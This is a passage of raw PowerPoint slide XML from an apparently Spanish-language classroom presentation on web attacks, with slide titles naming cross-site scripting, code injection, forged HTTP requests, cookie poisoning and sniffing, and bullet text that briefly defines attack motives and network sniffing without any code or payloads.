              <a:rPr lang="es-MX" dirty="0" smtClean="0"/>
              <a:t>método</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>robo de identidad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Obtener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>informacion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> no autorizada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Modificar algunos datos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Robar sesione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="Resultado de imagen para cookies web"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5028022" y="476880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4" name="Picture 4" descr="Resultado de imagen para cookies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022" y="3313065"/>
            <a:ext cx="62579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7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sniffing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412838"/>
            <a:ext cx="8946541" cy="4195481"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>es una técnica que consiste en “escuchar” o capturar toda la información que circula por una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" smtClean="0"/>
              <a:t>red</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>uno de los principales que se realizan cuando se intenta robar información.</a:t>
            </a:r>
            <a:endParaRPr lang="en-U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018170012"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="480614" y="2813368"/>
          <a:ext cx="10034985" cy="4002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711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276</TotalTime>
  <Words>338</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>63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Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Motivos de ataque</vt:lpstr>
      <vt:lpstr>Ataques URL de tipo semántico</vt:lpstr>
      <vt:lpstr>CROSS-SITE SCRIPTING</vt:lpstr>
      <vt:lpstr>Cross Site Scripting no persistente </vt:lpstr>
      <vt:lpstr>Inyección de código</vt:lpstr>
      <vt:lpstr>Peticiones HTTP falsificadas</vt:lpstr>
      <vt:lpstr>Cookie poisoning</vt:lpstr>
      <vt:lpstr>sniffing</vt:lpstr>
      <vt:lpstr>ROBO EN SERVIDOR COMPARTIDO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21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-12T21:20:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-13T17:15:02Z</dcterms:modified>
</cp:coreProperties>
</file>